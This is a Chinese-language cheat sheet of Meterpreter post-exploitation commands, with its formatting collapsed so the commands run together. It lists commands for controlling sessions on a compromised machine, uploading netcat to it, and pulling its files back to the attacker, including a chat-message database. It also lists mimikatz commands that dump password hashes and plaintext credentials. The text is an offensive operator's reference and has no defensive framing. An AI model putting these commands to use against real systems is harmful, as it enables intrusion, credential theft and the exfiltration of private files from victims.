基本命令
help# 查看Meterpreter帮助background#返回,把meterpreter后台挂起bgkill# 杀死一个背景 meterpreter 脚本bglist#提供所有正在运行的后台脚本的列表bgrun#作为一个后台线程运行脚本channel#显示活动频道sessions -i number # 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用sesssions -k number #与会话进行交互close# 关闭通道exit# 终止 meterpreter 会话quit# 终止 meterpreter 会话interact id #切换进一个信道run#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等irb# 进入 Ruby 脚本模式
文件系统命令
cat c:\boot.ini#查看文件内容,文件必须存在del c:\boot.ini #删除指定的文件upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload setup.exe C:\\windows\\system32\download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/edit c:\boot.ini # 编辑文件getlwd#打印本地目录getwd#打印工作目录lcd#更改本地目录ls#列出在当前目录中的文件列表lpwd#打印本地目录pwd#输出工作目录cd c:\\ #进入目录文件下rm file #删除文件mkdir dier #在受害者系统上的创建目录rmdir#受害者系统上删除目录dir#列出目标主机的文件和文件夹信息mv#修改目标主机上的文件名search -d d:\\www -f web.config #search 文件,如search -d c:\\ -f*.docmeterpreter > search -f autoexec.bat #搜索文件meterpreter > search -f sea*.bat c:\\xamp\\enumdesktops #用户登录数
(1)下载文件
使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件
(2)上传文件
“upload”命令为上传文件到我们的目标机器,在图中我们上传了ll.txt到目标机器的c:\pp\下。
(3)查看文件
“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。
mimikatz模块
meterpreter > load mimikatz #加载mimikatzmeterpreter > msv #获取hash值meterpreter > kerberos #获取明文meterpreter >ssp #获取明文信息meterpreter > wdigest #获取系统账户信息meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示meterpreter >mimikatz_command -f hash:: #获取目标 hashmeterpreter > mimikatz_command -f samdump::hashesmeterpreter > mimikatz_command -f sekurlsa::searchPasswords
